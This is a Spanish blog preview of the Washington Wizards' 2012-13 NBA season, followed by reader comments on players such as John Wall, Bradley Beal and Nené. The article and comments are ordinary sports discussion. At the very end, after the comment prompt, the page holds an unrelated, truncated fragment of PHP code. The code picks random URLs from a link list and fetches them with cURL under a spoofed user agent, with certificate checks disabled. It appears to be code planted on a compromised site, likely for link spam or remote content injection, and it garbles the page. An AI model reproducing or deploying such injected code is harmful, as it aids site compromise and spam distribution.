Washington Wizards: Veteranos y noveles

20 de October de 2012 por Sancho88
Se acabó el recreo para los Wizards, suena la campana y deben volver a sus pupitres. Y esta vez no hay excusa. Se acabaron los parvulitos, el juego de las cocinitas, los babis de color azul y las gamberradas a media tarde. Comienzan la EGB. Se acabó el cachondeo de McGee, Young, Lewis, Blatche y compañía, y el ambiente de patio de colegio.

Randy Wittman es el profesor y debe imponer orden y armonía en estos Wizards que llevan muchos años vagando por el 30% de victorias. Las lesiones de rodilla de Arenas hace 5 años fueron un antes y un después en el ciclo evolutivo del equipo, pero ahora parece que existen argumentos de peso para poder revertir la situación. Wittman llegó de improviso en enero tras la destitución de ‘Cortefiel’ Saunders y ahora gestionará desde el principio un equipo medianamente serio, que tiene mimbres para aspirar a Playoffs si logran encajar bien las piezas. El problema es que comienzan desde cero prácticamente, con un montón de jugadores nuevos que en muchos casos llegan rebotados de otros equipos, como son los casos de Trevor Ariza o Emeka Okafor desde los Hornets (a cambio del jugador que salía sin camiseta a la pista, un tal Rashard Lewis, quien de oca a oca tiró porque le tocaba y acabó en los Heat), o con problemas crónicos de lesiones, como el propio Okafor o Nené. A cambio, se desprenden de morralla innecesaria como el propio Lewis, el amnistiado Blatche o el eterno adolescente McGee. 

En los nuevos Wizards, Wittman tendrá que vigilar el aspecto psicológico y defensivo del equipo y convertirlo en la faceta fundamental. Con hombres como Nené, Ariza, Okafor, Wall, Beal o Booker, no debería pasar muchos problemas para imprimir carácter de competición a sus chicos pero habrá que ver cómo congenian todos ellos. Sus contratos son altos y están garantizados por dos temporadas al menos (excepto Wall, que debería renovar este año), y la guinda del pastel se la lleva Nené con su multianual hasta 2016 por 13 millones de dólares al año. Está claro que McGee no era ni mucho menos la solución para el equipo, pero el peso que se quitaron de encima con la salida del díscolo pívot de los Nuggets les puede costar muy caro si Nené no demuestra todos sus recursos. Así, los Wizards pagarán casi 35 millones de dólares al frontcourt titular esperando obtener los resultados inmediatos en seriedad y defensa. Es una apuesta arriesgada pero necesaria, un cambio de estilo y mentalidad, una reconstrucción sobre unos cimientos ruinosos de jóvenes irresponsables que no llevaba a ningún sitio.

Si la actitud competitiva descansa sobre sus hombres altos, el liderazgo debe hacerlo sobre John Wall. El otrora número 1 del draft de 2010 no ha progresado todo lo que se esperaba de él, sobre todo en el aspecto colectivo, y a estas alturas se le debe exigir un nivel de madurez mayor. Los Wizards necesitan un líder que los dirija, un baluarte, y Wall está ante su último año garantizado. Si no rinde, en el club se pensarán si le ofrecen la team option para la próxima campaña. La paciencia no puede ser infinita con él, sobre todo porque no ha demostrado compromiso defensivo ni ha evolucionado prácticamente nada en su tiro exterior. En sus manos está dar un paso al frente y comandar al conjunto capitalino. Tiene talento, rapidez y físico privilegiado. Le falta ambición, temple y lectura de los partidos. No obstante, sin él el equipo no progresará hacia ninguna parte. Este año jugará para jugadores más fuertes y previsiblemente tendrá que adaptar su ritmo de juego al equipo. Okafor o Nené no se caracterizan por ser rápidos precisamente y si quiere implicarlos en el juego, tendrá que bajar el pistón, sosegar el ritmo y aprender a jugar en estático.

Junto a él aparece Bradley Beal, número 3 de este draft. El escolta de los Gators promete dar batalla en la lucha por el ROY y será un referente anotador para el equipo. De su química con Wall saldrán las opciones reales del conjunto. Le falta altura para la posición de escolta (1,91) en una liga hecha para gente muy grande, pero la pareja de bajitos que puede formar con Wall puede ser demoledora. La elección de Beal con el número 3 fue excelente para los Wizards, pues tras la salida de Nick Young a los Clippers, el equipo adolecía de un referente real en el juego exterior. Beal, a sus 19 años, parece preparado para este gran reto, una joya con talento que dará que hablar en un equipo totalmente renovado.

Como suplente y para completar el backourt, Jordan Crawford recogerá el trono de príncipe del libertinaje que dejó la salida de Young y saldrá desde el banquillo como sexto hombre para revolucionar los partidos. Tiene buena mano, pero abusa tanto del lanzamiento a canasta desde cualquier parte, que difícilmente pueda servir para algo más que desatascar al equipo en ataque y recargar las pilas de Beal dándole descansos.

Para sustituir a Wall, Shelvin Mack y AJ Price son las dos opciones. Price llega desde los Pacers cobrando el mínimo y su rol en el equipo debería ser muy residual. Sin embargo, Mack posee bastante talento, se puede adaptar al nuevo estilo defensivo del equipo y no le dará malos minutos de recambio a John Wall. En este inicio de temporada, además, se antoja importante su progresión y participación. Wall no volverá previsiblemente hasta finales de noviembre, y entre él y Price deben sacar las castañas del fuego.

En las alas nos encontramos a Trevor Ariza, quien parece encontrarse en la cuesta abajo de su carrera. Su competencia se llama Martell Webster, y, quizá, esta sea la posición más débil del equipo ahora mismo. Ariza no evolucionó todo lo que prometía en su paso por los Hornets y ahora debe motivarse por haber salido de la jaula de grillos que fue el año pasado Nueva Orleans. Quizá un ex campeón de la NBA como él aspirase a algo más pero ahora ha llegado a un equipo que debería ser contendiente por alguna de las últimas plazas para entrar en Playoffs en la Conferencia Este y ese parece un motivo más que suficiente para enseñar su mejor versión como jugador de baloncesto. Webster tampoco ofrece demasiadas garantías, pues ya conocemos las malas pasadas que le gasta su cabecita. Al menos, podrá defender y en ese aspecto Wittman tiene que estar tranquilo con sus dos aleros. James Singleton sería la tercera opción, aunque no contará con muchos minutos.

Y finalmente llegamos a la pintura. Particularmente, tengo más ganas de ver la evolución de los suplentes que de los titulares en este caso. Nené y Okafor ya sabemos qué nos van a ofrecer: defensa, defensa y más defensa. Nené, además, si está intenso en ataque puede llegar a ser un jugador de poste bajo bastante interesante y determinante. No obstante, veremos qué nivel de motivación puede ofrecer ahora mismo, pues no deja de ser un jugador importantísimo a nivel mundial jugando en un equipo mediano, por no decir irrelevante.

La principal ‘chicha’  del equipo, el pastelito, lo que todos queremos ver aparte de la pareja Wall-Beal, es a los señores Vesely, Seraphin y Booker. De Vesely solo se puede decir una palabra: imprevisible. Es decir, un señor con esa planta, esos brazos, esa pinta de jugón, solo debería ir hacia arriba, subir como la espuma y ganarse por derecho un puesto en el quinteto. O nos equivocamos todos con él o su evolución este año puede sorprender a muchísima gente y convertirse en uno de los principales aspirantes al MIP. Sin duda, es una pieza muy jugosa dentro del equipo. Aparentemente lo tiene todo y sólo queremos que nos sorprenda. Ni qué decir tiene que si lo hace bien, Okafor pondrá sus posaderas en el banquillo. Los otros dos jugadores, es decir, Seraphin y Booker, son dos 4’s leñeros, que se colocan muy bien en la defensa, capaces de taponar y defender bastante bien el poste bajo y no exentos de cierta categoría en ataque, tiro a media distancia y capacidad para correr a la contra. En ese aspecto son dos jugadores a los que les viene muy bien tener a un velocista como Wall de director de orquesta.

En resumen, las expectativas son esperanzadoras para los Wizards. No van a llegar demasiado lejos, pero este año sí deben dar guerra para jugar la postemporada. Por nivel, diría que no tienen todavía el suficiente empaque como para discutir estas últimas plazas con Atlanta, Chicago, New York, Milwaukee o Philadelphia pero tampoco son de los peores equipos del Este. Competir en torno a las 35 victorias podría ser un buen progreso para ellos. Todo lo que sea ir más allá y equilibrar el balance al 50% sería una gran sorpresa.

Quinteto: John Wall, Bradley Beal, Trevor Ariza,  Emeka Okafor, Nené Hilario
6º hombre: Jordan Crawford

Altas: Bradley Beal (Florida Gators), Emeka Okafor (New Orleans Hornets), Trevor Ariza (New Orleans Hornets), A.J. Price (Indiana Pacers), Martell Webster (Minnesota Timberwolves)
Bajas: Rashard Lewis (Miami Heat), Andray Blatche (Brooklyn Nets), Roger Mason (New Orleans Hornets),

Previsión: 35-47 (Fuera de Playoffs)

Comenta

19 comentarios a esta entrada

  1. simon dice:
    #1

    Nada que decir sobre el análisis, completito y el pronóstico me parece bastante ajustado. Good Job Sancho.

      Citar

  2. Chipi dice:
    #2

    Okafor, ay, Okafor… es uno de esos nombres que cuando los oigo me invade una somnolencia….. Okafor….

      Citar

  3. Sebastian dice:
    #3

    Nadie piensa que en Washington tienen un problema grande desaprovechando proyectos de buenos jugadores?
    O tal vez, los jugadores que draftean no tienen mucha cabeza.
    Blatche, Wall, McGee, y muchos son jugadores que tienen partidos espectaculares, con los cuales todos los aficionados al basquet nos emocionamos, y después entran en un pozo de muchos partidos sin hacer NADA.

      Citar

  4. txusma dice:
    #4

    Pero como se van a plantear los Wizards no ejercer la Team Opcion con John Wall? El chaval tiene sus defectos pero es un gran jugador. Solo fataría que los Wizards lo dejaran escapar.

      Citar

  5. Sancho88 dice:
    #5

    Mira los Kings, no van a renovar tampoco a Evans… y no creo que pida o esté en condiciones de pedir ninguna millonada…

      Citar

  6. simon dice:
    #6

    Yo creo que mas bien lo que van a hacer los Kings con Evans es ver cuanto se pueden ahorrar pues es restringido, si no recibe ninguna oferta desorbitada la igualarán para pagarle lo menos posible… si algún equipo quiere pegarse un tiro en el pie lo dejarán marchar.

      Citar

  7. Melo15 dice:
    #7

    Como me gustan tus análisis Sancho, yo espero muchas cosas Wall, no tengo claro si pertenece al club de McAgee y Blatche, creo que con jugadores veteranos a su lado va a jugar bien. Como Beal, gran elección de los Wizards, justo lo que le hacia falta a los Wizards, tiro exterior y profesionalidad.
    Del que no se que esperar es de Vesely, mala temporada rookie, nose porque los Wizards no escogieron a Leonard…
    39-43 fuera de PO.

    Sancho88: Mira los Kings, no van a renovar tampoco a Evans… y no creo que pida o esté en condiciones de pedir ninguna millonada…

    Sancho yo creo que los Kings antes de nada van a ver como juega Evans esta temporada, si vuelve a la senda de sus temporada rookie se lo quedan fijo, ahora yo creo que tendrían que echar a Thorton, o uno el otro pero los dos en el mismo equipo se molestan.

      Citar

  8. Sancho88 dice:
    #8

    Muchas gracias Melo!! Hombre, los Kings yo también pienso que no lo renuevan ahora pero esperarán a verano a ver qué pasa. En principio, ahora están saliendo los dos de escoltas y no se solapan, cada uno juega sus minutos, se tira sus tiros y no hay envidias, mientras sigan con ese rol puede salir bien la cosa. Los Kings ahora mismo están bastante bien, les falta que cuaje T-Rob (tengo fe absolutamente ciega en él) y le falta un alero titular de garantías. Yo sigo viendo claro el Evans x Granger.

      Citar

  9. Sancho88 dice:
    #9

    Vale, si antes lo decimos….

    http://sentimientoamarilloynaranja.blogspot.com.es/2012/10/los-wizards-renuevan-6-jugadores-de.html

    Tenías razón Txus, y te han hecho caso, jejej

    Ahora los Wizards se van a mover poco para este y el próximo año. Renuevan todo lo que tienen. La apuesta es en firme a por los playoffs

      Citar

  10. rumbero dice:
    #10

    Sebastian:
    Nadie piensa que en Washington tienen un problema grande desaprovechando proyectos de buenos jugadores?
    O tal vez, los jugadores que draftean no tienen mucha cabeza.
    Blatche, Wall, McGee, y muchos son jugadores que tienen partidos espectaculares, con los cuales todos los aficionados al basquet nos emocionamos, y después entran en un pozo de muchos partidos sin hacer NADA.

    Buena pregunta. Wall-Young-Crawford-Blatche-McGee debe andar en el Top-3 de “Quintetos con potencial”. Vale que ninguno de estos tiene la cabeza mejor amueblada de la NBA, pero ni Saunders ni nadie supo/pudo poner orden entre tanto figurita y decirles que se dejaran de pelear para ver quien llegaba antes al doble-doble y se pusieran a jugar de verdad. Luego además tenías al veterano de turno que debería ser una ayuda y ejemplo para los chavales cobrando 20 kilos sentado en el banquillo. Un desastre vaya, creo que lo podrían haber hecho mejor. A ver si al final resultará que McGee se convierte en un pedazo de pívot de la mano de Karl, Blatche resucita en los Nets y se convierte en un sexto hombre de lujo y Young en un microondas de la leche para los Sixers.

    El análisis, pues 100% de acuerdo así que poco que añadir. Ganas de ver a Beal. Y ganas de ver a donde llega Wall. Para mi tiene madera de jugadorazo y creo que poco a poco va mejorando en la dirección de juego (y sin bajar mucho las revoluciones) pero tiene un gran problema con el tiro exterior. El 3/42 en triples de la temporada pasada es tremendo

      Citar

  11. Txusma dice:
    #11

    Sancho88:
    Vale, si antes lo decimos….

    http://sentimientoamarilloynaranja.blogspot.com.es/2012/10/los-wizards-renuevan-6-jugadores-de.html

    Tenías razón Txus, y te han hecho caso, jejej

    Ahora los Wizards se van a mover poco para este y el próximo año. Renuevan todo lo que tienen. La apuesta es en firme a por los playoffs

    A mi de estos el que no me gusta nada es Jordan Crawford. No sabe hacer nada más que tirar como un pollo sin cabeza. El resto pueden aportar en diferentes facetas del juego pero este (y más teniend ya a Marcus Thorton) es un poco cancer.

      Citar

  12. Sancho88 dice:
    #12

    A Marcus Thornton???

      Citar

  13. Txusma dice:
    #13

    Sancho88:
    A Marcus Thornton???

    Digo que Jordan Crawford y Marcus Thorton son un poco redundantes y de tener que quedarme con uno de los 2 me quedaría con Thorton, aunque tampoco es q me guste mucho. Tu los has visto más pero me dan la impresión que solo saben tirar y tirar.

      Citar

  14. Jose Luis dice:
    #14

    Marcus Thornton está en kings txusma 🙂

      Citar

  15. Sancho88 dice:
    #15

    Además hace pocos días tumbó a vuestro equipo fetén, lo deberiais conocer, jejeej

      Citar

  16. Esteban dice:
    #16

    exelente sancho88,, comparto un 100%
    si miras el analisis de la temporada pasada d los wizards y el jugando a GM, escriibi todo muy a tono con lo tuyo!

      Citar

  17. Sancho88 dice:
    #17

    jejeje, lei tu resumen, para qué nos vamos a engañar, aunque ya lo tenía medio escrito, pero me sirvió para aclarar las últimas dudas

      Citar

  18. txusma dice:
    #18

    Jose Luis:
    Marcus Thornton está en kings txusma :)

    Joder, q mal estoy… Perdonadme :D:D

      Citar

  19. rumbero dice:
    #19

    Sancho88:
    Los Kings ahora mismo están bastante bien, les falta que cuaje T-Rob (tengo fe absolutamente ciega en él)

    Veremos lo que tarda en cuajar…de momento ya puedes comprar el poster que le hizo ayer a Howard por 4.99. Una ganga oye.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>